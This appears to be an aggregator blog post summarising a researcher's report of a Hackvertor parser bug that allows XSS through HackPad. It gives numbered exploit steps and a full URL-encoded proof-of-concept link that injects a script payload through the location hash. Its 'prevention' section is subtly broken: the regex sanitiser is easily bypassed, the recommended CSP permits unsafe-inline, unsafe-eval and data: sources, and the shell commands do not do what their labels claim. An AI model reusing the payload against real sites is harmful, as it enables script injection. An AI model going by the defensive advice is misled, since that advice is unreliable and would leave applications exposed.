Exploiting Hackvertor Parser Bug: XSS via HackPad

By /

Listen to this Post

Featured Image
Gareth Heyes, a researcher at PortSwigger Web Security, discovered a parser bug in Hackvertor that allowed cross-site scripting (XSS) through HackPad. The exploit involves a malicious site manipulating the `window.location.hash` after a user disables the sandbox.

Exploit Steps:

1. User visits a malicious site.

  1. Clicks a link to open HackPad in a new window.

3. User disables the sandbox.

4. Malicious site modifies `window.location.hash`.

5. User clicks “Execute” in HackPad.

6. XSS payload triggers.

Proof of Concept (PoC) URL:

https://portswigger-labs.net/mxss/?input=%3Ca%20href%3D%23%20onclick%3D%22win%3Dwindow.open(%27https%3A%2F%2Fhackvertor.co.uk%2Fhack-pad%27)%3BsetTimeout(x%3D%3Ewin.location%3D%27https%3A%2F%2Fhackvertor.co.uk%2Fhack-pad%23eyJpbnB1dCI6ImFsZXJ0KGRvY3VtZW50LmRvbWFpbikiLCJodG1sSW5wdXQiOiIiLCJjc3AiOiJkZWZhdWx0LXNyYyBkYXRhOjsgc2NyaXB0LXNyYyBkYXRhOiAndW5zYWZlLWV2YWwnICd1bnNhZmUtaW5saW5lJztzdHlsZS1zcmMgZGF0YTogJ3Vuc2FmZS1pbmxpbmUnOyIsImNoYXJzZXQiOiJVVEYtOCJ9%27%2C10000)%22%3Etest%3C%2Fa%3E

You Should Know:

Preventing XSS in Web Applications

1. Sanitize User Input:

function sanitizeInput(input) {
return input.replace(/<script.?>.?<\/script>/gi, '');
}

2. Use Content Security Policy (CSP):

<meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'unsafe-inline' 'unsafe-eval' data:;">

3. Disable Dangerous JavaScript Functions:

delete window.eval;
delete window.setTimeout;

Linux Security Commands:

  • Check for open ports: 
    sudo netstat -tulnp | grep LISTEN
  • Audit file permissions: 
    find /var/www -type f -perm 777 -exec ls -la {} \;
  • Prevent command injection: 
    sudo chmod 750 /usr/bin/python

Windows Security Commands:

  • Check running processes: 
    Get-Process | Where-Object { $_.Path -like "temp" }
  • Disable unsafe protocols: 
    Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 2.0\Server" -Name Enabled -Value 0

What Undercode Say:

This exploit demonstrates how disabling security features (like sandboxing) can lead to XSS vulnerabilities. Always enforce strict CSP policies, sanitize inputs, and avoid unsafe JavaScript functions.

Expected Output:

A successful XSS execution when the sandbox is disabled, leading to arbitrary script execution in HackPad.

Prediction:

Future web security tools may enforce stricter sandboxing by default, preventing similar bypasses. Researchers will likely find more edge cases in parser behavior, leading to improved sanitization techniques.

References:

Reported By: Gareth Heyes – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram

Related Posts: